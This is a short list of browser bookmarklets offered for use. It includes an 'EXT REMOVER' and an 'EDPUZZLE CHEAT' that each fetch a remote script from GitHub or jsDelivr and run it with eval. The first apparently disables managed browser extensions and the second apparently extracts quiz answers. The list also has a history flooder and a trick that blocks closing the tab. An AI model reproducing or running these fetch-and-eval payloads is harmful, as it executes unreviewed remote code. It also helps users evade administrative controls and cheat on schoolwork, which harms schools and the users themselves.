Scripts/Bookmarklets


I do not own any of these bookmarklets, they belong to their developer(s).


EXT REMOVER

javascript:fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});


HISTORY FLOODER

javascript: var num=prompt("How Times Do You Want This Page To Show Up In your History?\nMade By: KyleShadowed");done=false;x=window.location.href;for (var i=1; i<=num; i++){history.pushState(0, 0, i==num?x:i.toString());if(i==num){done=true}}if(done===true){alert("History Flooding Successful!\n "+window.location.href+" \nNow Appears In Your History "+num+(num==1?" time.":" Times. \nMade By: KyleShadowed"))} 


ANTI-CLOSE TAB

javascript:onbeforeunload=i=>1

EDPUZZLE CHEAT

javascript:fetch("//cdn.jsdelivr.net/gh/ading2210/edpuzzle-answers@latest/script.js").then(function(response) { return response.text() }).then(function(text) { eval(text) })